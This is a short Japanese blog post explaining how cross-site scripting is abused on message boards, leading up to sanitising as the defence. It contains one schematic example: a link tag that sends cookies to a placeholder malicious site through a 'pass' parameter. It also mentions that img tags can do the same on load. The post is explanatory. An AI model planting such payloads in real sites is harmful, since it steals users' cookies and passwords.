前回XSS(クロスサイトスクリプティング)についての説明の記事を書いた。今回どのようなケースで悪意のあるスクリプトを書くのか記事を書いてみたいと思う。
掲示板でHTMLやJavaScriptのタグが使用できるとなると、一体どのよなタグを入れてくるのか?JavaScriptではクッキーが読み出せるので以下のようなタグを入れてくるケースが多い。
<a href='https://悪意のあるサイトURL/?pass=<script>クッキー読み出しのスクリプト</script>'>クリック</a>
上記の"クリック"を押すと"pass"というパラメータでパスワードなどを保存したクッキーが送信されてしまう。またimgタグを使用すれば画像など読み出しただけで送信されるみたいである。このような事を防ぐ対策として"サニタイジング"というやり方がある。
次回この対策についての記事を書いていきたい。